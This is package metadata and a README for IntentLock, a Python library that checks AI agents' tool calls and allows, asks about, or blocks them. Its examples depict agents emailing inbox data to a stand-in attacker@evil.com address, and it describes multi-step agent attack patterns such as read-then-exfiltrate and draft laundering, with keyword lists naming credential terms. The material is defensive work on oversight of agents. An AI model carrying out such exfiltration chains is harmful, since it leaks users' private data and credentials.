Metadata-Version: 2.4
Name: intentlock
Version: 0.1.0
Summary: Safety layer for AI agents and automations that checks tool calls before execution.
Author: Radulescu Horia
License: MIT
Project-URL: Homepage, https://github.com/Vybz492/intentlock
Project-URL: Repository, https://github.com/Vybz492/intentlock
Project-URL: Issues, https://github.com/Vybz492/intentlock/issues
Keywords: ai-safety,agent-security,tool-calling,prompt-injection,llm,guardrails
Classifier: Development Status :: 3 - Alpha
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Libraries :: Python Modules
Classifier: Typing :: Typed
Requires-Python: >=3.11
Description-Content-Type: text/markdown
License-File: LICENSE
Provides-Extra: dev
Requires-Dist: pytest>=8.0; extra == "dev"
Provides-Extra: embeddings
Requires-Dist: sentence-transformers>=2.0; extra == "embeddings"
Requires-Dist: numpy>=1.24; extra == "embeddings"
Dynamic: license-file

# IntentLock

[![CI](https://github.com/Vybz492/intentlock/actions/workflows/ci.yml/badge.svg)](https://github.com/Vybz492/intentlock/actions/workflows/ci.yml)

A framework-neutral security layer for tool-using AI agents. IntentLock sits between an agent and its tools, scoring every tool call for risk and deciding whether to **allow**, **ask** (request human confirmation), or **block** it — before execution.

No LLM calls, no external APIs, no required dependencies (the `embeddings` extra is optional). Pure Python, deterministic, fast.

## Why

LLM agents can be manipulated — prompt injection, data exfiltration, typosquatting, multi-step attack chains. IntentLock catches these at the tool-call level by combining:

- **Risk classification** — keyword-based tag inference with weighted scoring
- **Argument inspection** — recipient analysis, typosquatting detection, sensitive path scanning, nested payload detection, outbound-action detection (verbs/destinations buried in args, not just the tool name)
- **Session tracking** — multi-step pattern detection (read-then-exfiltrate, draft laundering, bulk access, privilege escalation)
- **Policy rules** — deterministic rules that always escalate, never downgrade
- **Goal alignment** — optional semantic similarity scoring (with sentence-transformers)
- **Audit logging** — full JSONL trace of every decision

## Install

From a local clone of the repository:

```bash
pip install -e .
```

Or with [uv](https://docs.astral.sh/uv/):

```bash
uv sync
```

For development (includes pytest):

```bash
pip install -e ".[dev]"
```

For optional goal-alignment scoring (sentence-transformers + numpy):

```bash
pip install -e ".[embeddings]"
```

## Quick Start

```python
from intentlock import IntentLock, PolicyConfig, ToolCall

lock = IntentLock(
    user_goal="Reply to my professor's email.",
    policy=PolicyConfig.PERMISSIVE,
    known_contacts=["professor@university.edu"],
    trusted_domains=["university.edu"],
)

# Safe action — known contact, matches goal
decision = lock.check(ToolCall(
    name="send_email",
    args={"to": "professor@university.edu", "body": "Thanks for the feedback."},
))
print(decision.action)  # DecisionAction.ALLOW

# Suspicious action — unknown recipient, private data
decision = lock.check(ToolCall(
    name="send_email",
    args={"to": "attacker@evil.com", "body": "inbox contents and personal data"},
))
print(decision.action)  # DecisionAction.BLOCK
```
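
The `known_contacts` and `trusted_domains` arguments above feed argument inspection (recipient analysis and typosquatting detection). The README does not specify the matching algorithm, so the following is a minimal sketch that assumes a plain Levenshtein edit-distance check against trusted domains. `edit_distance`, `classify_recipient`, the `max_distance` threshold, and the returned labels are hypothetical, not IntentLock's API.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic two-row dynamic program."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(
                prev[j] + 1,               # deletion
                cur[j - 1] + 1,            # insertion
                prev[j - 1] + (ca != cb),  # substitution (free if equal)
            ))
        prev = cur
    return prev[-1]


def classify_recipient(
    address: str,
    known_contacts: list[str],
    trusted_domains: list[str],
    max_distance: int = 2,  # hypothetical threshold for "looks like a trusted domain"
) -> str:
    """Hypothetical recipient check; the labels are illustrative only."""
    address = address.strip().lower()
    domain = address.rpartition("@")[2]
    if address in {c.lower() for c in known_contacts}:
        return "known_contact"
    trusted = [d.lower() for d in trusted_domains]
    if domain in trusted:
        return "trusted_domain"
    # A near miss on a trusted domain is more suspicious than an unrelated domain.
    if any(0 < edit_distance(domain, d) <= max_distance for d in trusted):
        return "possible_typosquat"
    return "unknown"


print(classify_recipient("prof@un1versity.edu", ["professor@university.edu"], ["university.edu"]))
# possible_typosquat
```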

## Wrapping Tools

IntentLock can wrap existing functions so every call is checked automatically:

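```python
from intentlock.wrapper import IntentLockViolation

def send_email(to: str, subject: str, body: str) -> dict:
    ...  # real email-sending implementation goes here

# `lock` is the IntentLock instance from the Quick Start
safe_send = lock.wrap_tool(send_email, tool_name="send_email")

# ALLOW -> executes normally
safe_send(to="professor@university.edu", subject="Re: feedback", body="Thanks.")

# BLOCK -> raises IntentLockViolation instead of sending
try:
    safe_send(to="attacker@evil.com", subject="Inbox export", body="inbox data")
except IntentLockViolation as exc:
    print(f"Blocked: {exc}")
```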
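
Conceptually, a wrapper of this kind runs the check first and only calls through to the real function when the decision permits it. The sketch below shows that pattern with a standard decorator. `guard`, `ToolBlocked`, `toy_check`, and the `confirm` callback for ASK decisions are all hypothetical; in particular, treating an unconfirmed ASK as a block is an assumption and may not match how `wrap_tool` handles ASK.

```python
import functools
from typing import Any, Callable


class ToolBlocked(Exception):
    """Hypothetical stand-in for IntentLockViolation."""


def guard(
    check: Callable[[str, dict[str, Any]], str],
    tool_name: str,
    confirm: Callable[[str, dict[str, Any]], bool] = lambda name, args: False,
) -> Callable[[Callable[..., Any]], Callable[..., Any]]:
    """Wrap a keyword-argument tool so `check` runs before every call."""

    def decorator(func: Callable[..., Any]) -> Callable[..., Any]:
        @functools.wraps(func)
        def wrapper(**kwargs: Any) -> Any:
            action = check(tool_name, kwargs)  # "allow", "ask", or "block"
            if action == "block":
                raise ToolBlocked(f"{tool_name} blocked")
            if action == "ask" and not confirm(tool_name, kwargs):
                # Assumption: an unconfirmed ASK is treated like a block.
                raise ToolBlocked(f"{tool_name} not confirmed")
            return func(**kwargs)

        return wrapper

    return decorator


def toy_check(name: str, args: dict[str, Any]) -> str:
    # Hypothetical policy: block anything addressed to evil.com.
    return "block" if str(args.get("to", "")).endswith("@evil.com") else "allow"


@guard(toy_check, "send_email")
def send_email(to: str, body: str) -> dict:
    return {"sent_to": to}
```

`functools.wraps` keeps the wrapped tool's name and docstring, which matters when agent frameworks build tool schemas from function metadata.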

## Policies

Four built-in presets control how risk levels map to decisions:

| Policy | Low | Medium | High | Critical |
|---|---|---|---|---|
| `STRICT` | allow | ask | block | block |
| `PERMISSIVE` | allow | allow | ask | block |
| `LOG_ONLY` | allow | allow | allow | allow |
| `PARANOID` | ask | block | block | block |

```python
lock = IntentLock(user_goal="...", policy=PolicyConfig.STRICT)
```
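
The preset table can be read as a plain lookup from risk level to action. This sketch encodes it as data; `Level`, `PRESETS`, and `decide` are hypothetical helpers, and how IntentLock converts a numeric score into a level is not shown here.

```python
from enum import Enum


class Level(Enum):
    LOW = "low"
    MEDIUM = "medium"
    HIGH = "high"
    CRITICAL = "critical"


# Rows of the preset table: actions for low, medium, high, critical.
PRESETS: dict[str, tuple[str, str, str, str]] = {
    "STRICT": ("allow", "ask", "block", "block"),
    "PERMISSIVE": ("allow", "allow", "ask", "block"),
    "LOG_ONLY": ("allow", "allow", "allow", "allow"),
    "PARANOID": ("ask", "block", "block", "block"),
}


def decide(preset: str, level: Level) -> str:
    """Look up the action a preset assigns to a risk level."""
    return PRESETS[preset][list(Level).index(level)]
```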

## Custom Rules

Add deterministic rules on top of score-based decisions. A matching rule can raise the decision (for example from allow to block) but never lower it:

```python
from intentlock import PolicyRule

my_rules = [
    PolicyRule(
        id="block_financial",
        priority=100,
        condition=lambda ctx: "financial_action" in ctx.risk_tags,
        action="block",
        reason="All financial operations require manual approval.",
    ),
]

lock = IntentLock(user_goal="...", rules=my_rules)
```

Rule conditions can also key on detected multi-step patterns, which are exposed
as `flow:<pattern>` tags (e.g. `flow:bulk_access`, `flow:read_then_exfiltrate`).
This lets a rule act on session flow regardless of the active policy tier:

```python
PolicyRule(
    id="block_exfil_chain",
    priority=100,
    condition=lambda ctx: "flow:read_then_exfiltrate" in ctx.risk_tags,
    action="block",
    reason="Read-then-exfiltrate chains are never allowed.",
)
```
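
The escalate-only guarantee can be pictured as taking the most severe of the score-based action and every matching rule's action. The sketch below assumes the ordering allow < ask < block; `Ctx`, `Rule`, and `apply_rules` are simplified hypothetical stand-ins for `PolicyRule` and its context object, not IntentLock's implementation.

```python
from dataclasses import dataclass
from typing import Callable

SEVERITY = {"allow": 0, "ask": 1, "block": 2}


@dataclass
class Ctx:
    risk_tags: set[str]  # may include flow:<pattern> tags from session tracking


@dataclass
class Rule:
    id: str
    priority: int
    condition: Callable[[Ctx], bool]
    action: str
    reason: str


def apply_rules(base_action: str, ctx: Ctx, rules: list[Rule]) -> tuple[str, list[str]]:
    """Return the final action and matched rule ids (highest priority first)."""
    action, matched = base_action, []
    for rule in sorted(rules, key=lambda r: r.priority, reverse=True):
        if rule.condition(ctx):
            matched.append(rule.id)
            # Escalate only: a rule can never lower the current action.
            if SEVERITY[rule.action] > SEVERITY[action]:
                action = rule.action
    return action, matched


rules = [
    Rule("block_exfil_chain", 100,
         lambda ctx: "flow:read_then_exfiltrate" in ctx.risk_tags,
         "block", "Read-then-exfiltrate chains are never allowed."),
    Rule("allow_reads", 10, lambda ctx: "read_only" in ctx.risk_tags,
         "allow", "Hypothetical rule that tries, and fails, to downgrade."),
]
```

Because taking a maximum is order-independent, priority in this sketch only affects the order in which matched rules are reported.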

## Audit Logging

Enable JSONL audit logging for every decision:

```python
lock = IntentLock(
    user_goal="...",
    audit_log="decisions.jsonl",
)
```

Each line records the timestamp, user goal, tool call, risk score, tags, escalations, matched rules, flow alerts, and final action.
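
JSONL stores one JSON object per line, so the log can be appended to cheaply and streamed back line by line. This sketch writes and summarizes such a file; `append_record` and `count_actions` are hypothetical, and the field names (`tool`, `risk_score`, `action`) are assumptions, so check a real `decisions.jsonl` for the actual keys.

```python
import json
from collections import Counter
from pathlib import Path


def append_record(path: Path, record: dict) -> None:
    """Append one decision as a single JSON line."""
    with path.open("a", encoding="utf-8") as f:
        f.write(json.dumps(record) + "\n")


def count_actions(path: Path) -> Counter:
    """Tally decisions by their (assumed) "action" field, skipping blank lines."""
    counts: Counter = Counter()
    with path.open(encoding="utf-8") as f:
        for line in f:
            if line.strip():
                counts[json.loads(line)["action"]] += 1
    return counts
```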

## Decision Object

Every `lock.check()` returns a `Decision` with full transparency:

```python
decision = lock.check(tool_call)

decision.action           # DecisionAction.ALLOW / ASK / BLOCK
decision.risk_score       # 0.0 - 1.0
decision.effective_risk   # risk after goal-alignment adjustment (aligned dampens, off-task amplifies)
decision.risk_level       # RiskLevel.LOW / MEDIUM / HIGH / CRITICAL
decision.risk_tags        # ["external_send", "private_data_access", ...]
decision.escalations      # ["external_send+private_data_access"]
decision.matched_rules    # ["block_private_external"]
decision.flow_alerts      # [FlowAlert(pattern="read_then_exfiltrate", ...)]
decision.reason           # human-readable explanation
```
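
`effective_risk` adjusts the raw score by how well the call matches `user_goal`. The README does not give the formula, so this is a hypothetical sketch: cosine similarity between two embedding vectors (which sentence-transformers' `SentenceTransformer.encode` could supply when the `embeddings` extra is installed), followed by a linear adjustment around a neutral similarity of 0.5. The `strength` parameter and the 0.5 midpoint are invented for illustration.

```python
import math


def cosine(a: list[float], b: list[float]) -> float:
    """Cosine similarity of two equal-length vectors (0.0 if either is all zeros)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def effective_risk(risk: float, similarity: float, strength: float = 0.5) -> float:
    """Hypothetical adjustment: aligned calls dampen risk, off-task calls amplify it."""
    sim = min(max(similarity, 0.0), 1.0)
    # factor is 1 - strength at sim=1, 1.0 at sim=0.5, and 1 + strength at sim=0
    factor = 1.0 + strength * 2.0 * (0.5 - sim)
    return min(max(risk * factor, 0.0), 1.0)
```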

## Risk Tags

Tags are inferred from tool names and argument content:

| Tag | Weight | Triggered by |
|---|---|---|
| `read_only` | 0.0 | read, get, fetch, list, search, ... |
| `write_action` | 0.3 | write, update, create, edit, save, ... |
| `network_access` | 0.3 | URLs, webhooks, endpoints |
| `delete_action` | 0.5 | delete, remove, purge, destroy, ... |
| `private_data_access` | 0.5 | inbox, personal, contacts, messages, ... |
| `external_send` | 0.6 | send, forward, post, share, ... |
| `financial_action` | 0.8 | pay, transfer, purchase, charge, ... |
| `credential_access` | 0.9 | password, token, secret, api_key, ... |

Escalation combos add bonus risk when multiple tags co-occur (e.g., `external_send + private_data_access` adds +0.3).
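
Tag inference and weighted scoring can be sketched as follows, using only the keywords listed in the table (plus "credential", per the Limitations section) and the one escalation combo quoted above. Two choices are assumptions rather than documented behavior: the base score is the highest single tag weight, and the total is clamped to 1.0. `stem`, `infer_tags`, and `risk_score` are hypothetical names; the naive `-s` stemming mirrors the plural handling described under Limitations.

```python
import re

WEIGHTS = {
    "read_only": 0.0, "write_action": 0.3, "network_access": 0.3,
    "delete_action": 0.5, "private_data_access": 0.5, "external_send": 0.6,
    "financial_action": 0.8, "credential_access": 0.9,
}

# Subset of the table's keywords, stored in stemmed (singular) form.
KEYWORDS = {
    "read_only": {"read", "get", "fetch", "list", "search"},
    "write_action": {"write", "update", "create", "edit", "save"},
    "network_access": {"url", "webhook", "endpoint"},
    "delete_action": {"delete", "remove", "purge", "destroy"},
    "private_data_access": {"inbox", "personal", "contact", "message"},
    "external_send": {"send", "forward", "post", "share"},
    "financial_action": {"pay", "transfer", "purchase", "charge"},
    "credential_access": {"password", "token", "secret", "credential"},
}

COMBOS = {frozenset({"external_send", "private_data_access"}): 0.3}


def stem(word: str) -> str:
    # Strip a plain plural "-s" only ("credentials" -> "credential").
    return word[:-1] if len(word) > 3 and word.endswith("s") and not word.endswith("ss") else word


def infer_tags(tool_name: str, args: dict) -> set[str]:
    """Tokenize the tool name and argument values, then match keyword sets."""
    text = " ".join([tool_name, *map(str, args.values())]).lower()
    tokens = {stem(t) for t in re.findall(r"[a-z0-9]+", text)}
    return {tag for tag, words in KEYWORDS.items() if tokens & words}


def risk_score(tags: set[str]) -> float:
    """Highest tag weight plus any combo bonuses, clamped to 1.0."""
    base = max((WEIGHTS[t] for t in tags), default=0.0)
    bonus = sum(b for combo, b in COMBOS.items() if combo <= tags)
    return min(base + bonus, 1.0)
```

For the Quick Start's suspicious call, `infer_tags("send_email", {"to": "attacker@evil.com", "body": "inbox contents and personal data"})` yields `external_send` and `private_data_access`, so the sketch scores it at 0.6 + 0.3.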

## Session Flow Detection

IntentLock tracks tool-call sequences within a session and detects attack patterns:

- **read_then_exfiltrate** — data read followed by outbound send referencing that data
- **bulk_access** — same read tool called 3+ times
- **draft_laundering** — draft creation followed by external send
- **privilege_escalation** — credential read followed by write operation (a *blocked* credential read followed by a write surfaces as **attempted_privilege_escalation** at lower severity — the agent never obtained the credentials, but the intent is still flagged)

A default `ask_bulk_access` rule ships built in: when `flow:bulk_access` fires it
forces confirmation regardless of policy tier, so repeated bulk reads still escalate
even when their score alone (pure `read_only`) would allow.

```python
lock.check(ToolCall(name="read_inbox", args={"folder": "inbox"}))
# ... later in the session ...
decision = lock.check(ToolCall(
    name="send_email",
    args={"to": "attacker@evil.com", "body": "inbox data"},
))
# decision.flow_alerts includes read_then_exfiltrate
```

Reset session history between conversations:

```python
lock.reset_session()
```
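
A session tracker only needs an ordered history of past calls and their tags. The sketch below detects the four listed patterns under simplifying assumptions: tags are supplied by the caller, `read_then_exfiltrate` fires on any earlier private-data read without checking that the send actually references that data, and draft steps are recognized by `"draft"` in the tool name. `Step` and `SessionTracker` are hypothetical, not the contents of `session.py`.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Step:
    tool: str
    tags: frozenset[str]
    blocked: bool = False


@dataclass
class SessionTracker:
    """Hypothetical per-session detector for multi-step patterns."""

    history: list[Step] = field(default_factory=list)
    bulk_threshold: int = 3  # "same read tool called 3+ times"

    def record(self, tool: str, tags: set[str], blocked: bool = False) -> list[str]:
        """Check a new call against the history, then append it; return alert names."""
        prior = self.history
        alerts: list[str] = []

        # bulk_access: this call brings one read-only tool to the threshold or beyond.
        if "read_only" in tags:
            earlier = sum(1 for s in prior if s.tool == tool and "read_only" in s.tags)
            if earlier + 1 >= self.bulk_threshold:
                alerts.append("bulk_access")

        if "external_send" in tags:
            # read_then_exfiltrate, simplified: any earlier private-data read counts.
            if any("private_data_access" in s.tags for s in prior):
                alerts.append("read_then_exfiltrate")
            # draft_laundering: a draft step earlier in the session, then an external send.
            if any("draft" in s.tool for s in prior):
                alerts.append("draft_laundering")

        if "write_action" in tags:
            cred_reads = [s for s in prior if "credential_access" in s.tags]
            if any(not s.blocked for s in cred_reads):
                alerts.append("privilege_escalation")
            elif cred_reads:
                # Every credential read was blocked: report the attempt under its own name.
                alerts.append("attempted_privilege_escalation")

        self.history.append(Step(tool, frozenset(tags), blocked))
        return alerts

    def reset(self) -> None:
        """Forget the history, e.g. between conversations."""
        self.history.clear()
```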

## Demo

Run the email agent demo to see IntentLock in action across 7 scenarios (normal workflows, prompt injection, typosquatting, draft laundering, etc.):

```bash
python examples/email_agent_demo/run_demo.py
```

## Evaluation

Run the evaluation harness (103 labeled cases across basic, realistic, and adversarial tiers):

```bash
python eval/run_eval.py
```

Reports accuracy, confusion matrix, and per-action precision/recall/F1.
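
These metrics follow their standard definitions. The sketch below computes them from parallel lists of expected and predicted actions; `evaluate` is a hypothetical helper, not the harness's actual code.

```python
from collections import Counter

ACTIONS = ("allow", "ask", "block")


def evaluate(expected: list[str], predicted: list[str]) -> dict:
    """Accuracy, confusion matrix, and per-action precision/recall/F1."""
    if len(expected) != len(predicted):
        raise ValueError("expected and predicted must have the same length")
    confusion = Counter(zip(expected, predicted))  # (true, predicted) -> count
    correct = sum(confusion[(a, a)] for a in ACTIONS)
    per_action = {}
    for a in ACTIONS:
        tp = confusion[(a, a)]
        predicted_a = sum(confusion[(t, a)] for t in ACTIONS)  # column total
        actual_a = sum(confusion[(a, p)] for p in ACTIONS)     # row total
        precision = tp / predicted_a if predicted_a else 0.0
        recall = tp / actual_a if actual_a else 0.0
        f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
        per_action[a] = {"precision": precision, "recall": recall, "f1": f1}
    return {
        "accuracy": correct / len(expected) if expected else 0.0,
        "confusion": {(t, p): confusion[(t, p)] for t in ACTIONS for p in ACTIONS},
        "per_action": per_action,
    }
```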

## Tests

```bash
uv run pytest
```

242 tests covering risk classification, argument inspection, policy rules, session flow detection, audit logging, and tool wrapping.

## Project Structure

```
src/intentlock/
    __init__.py      # Public API
    core.py          # IntentLock engine, Decision, PolicyConfig, ToolCall
    risk.py          # Tag inference and risk scoring
    inspection.py    # Argument-level risk signals (recipients, typosquatting, etc.)
    rules.py         # Deterministic policy rules
    session.py       # Multi-step flow detection
    intent.py        # Goal alignment scoring
    audit.py         # JSONL audit logger
    wrapper.py       # Tool wrapping (wrap_tool, IntentLockViolation)
tests/               # 242 unit and integration tests
eval/                # 103-case evaluation harness
examples/            # Email agent demo
```

## Limitations

- **Keyword-based classification** — relies on tool names and argument content matching known patterns. Novel tool names or obfuscated arguments may not be tagged correctly.
- **No semantic understanding** — without the optional sentence-transformers dependency, goal alignment is unavailable. Risk scoring is purely pattern-based.
- **English-only** — keyword matching assumes English tool names and argument values.
- **No runtime learning** — tag weights and rules are static. The system does not adapt based on observed behavior.
- **False positives on naming** — tools like `deliver_package` trigger `external_send` because "deliver" matches the keyword list.
- **Limited plural stemming** — plain `-s` plurals are handled (e.g. "credentials" matches "credential"), but `-es`/`-ies` forms (e.g. "queries" vs "query") are not.

## License

MIT
